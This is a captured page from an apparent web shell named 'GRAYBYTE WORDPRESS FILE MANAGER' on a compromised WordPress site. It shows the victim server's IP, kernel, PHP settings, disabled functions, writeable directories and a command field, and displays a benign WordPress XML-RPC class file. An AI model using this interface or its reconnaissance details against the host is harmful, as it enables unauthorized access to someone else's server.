GRAYBYTE WORDPRESS FILE MANAGER2064

Server IP : 149.255.58.128 / Your IP : 216.73.216.199
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/wheelch2/antalyamobilityscooter.com/wp-includes/IXR/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/wheelch2/antalyamobilityscooter.com/wp-includes/IXR//class-IXR-request.php
<?php

/**
 * IXR_Request
 *
 * @package IXR
 * @since 1.5.0
 */
class IXR_Request
{
    var $method;
    var $args;
    var $xml;

	/**
	 * PHP5 constructor.
	 */
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
        $this->xml = <<<EOD
<?xml version="1.0"?>
<methodCall>
<methodName>{$this->method}</methodName>
<params>

EOD;
        foreach ($this->args as $arg) {
            $this->xml .= '<param><value>';
            $v = new IXR_Value($arg);
            $this->xml .= $v->getXml();
            $this->xml .= "</value></param>\n";
        }
        $this->xml .= '</params></methodCall>';
    }

	/**
	 * PHP4 constructor.
	 */
	public function IXR_Request( $method, $args ) {
		self::__construct( $method, $args );
	}

    function getLength()
    {
        return strlen($this->xml);
    }

    function getXml()
    {
        return $this->xml;
    }
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 20 2025 03:29:06
1032 / wheelch2
0755
.htaccess
0 KB
March 26 2025 13:44:20
1032 / wheelch2
0444
class-IXR-base64.php
0.404 KB
August 26 2016 22:08:33
1032 / wheelch2
0644
class-IXR-client.php
4.675 KB
June 30 2020 19:50:04
1032 / wheelch2
0644
class-IXR-clientmulticall.php
1.233 KB
June 30 2020 19:50:04
1032 / wheelch2
0644
class-IXR-date.php
1.651 KB
May 26 2019 00:12:54
1032 / wheelch2
0644
class-IXR-error.php
0.834 KB
August 26 2016 22:08:33
1032 / wheelch2
0644
class-IXR-introspectionserver.php
5.198 KB
August 26 2016 22:08:33
1032 / wheelch2
0644
class-IXR-message.php
7.999 KB
November 13 2024 04:42:28
1032 / wheelch2
0644
class-IXR-request.php
0.905 KB
August 26 2016 22:08:33
1032 / wheelch2
0644
class-IXR-server.php
6.514 KB
May 24 2021 02:18:58
1032 / wheelch2
0644
class-IXR-value.php
3.701 KB
August 26 2016 22:08:33
1032 / wheelch2
0644
error_log
1.25 KB
May 05 2025 07:45:02
1032 / wheelch2
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF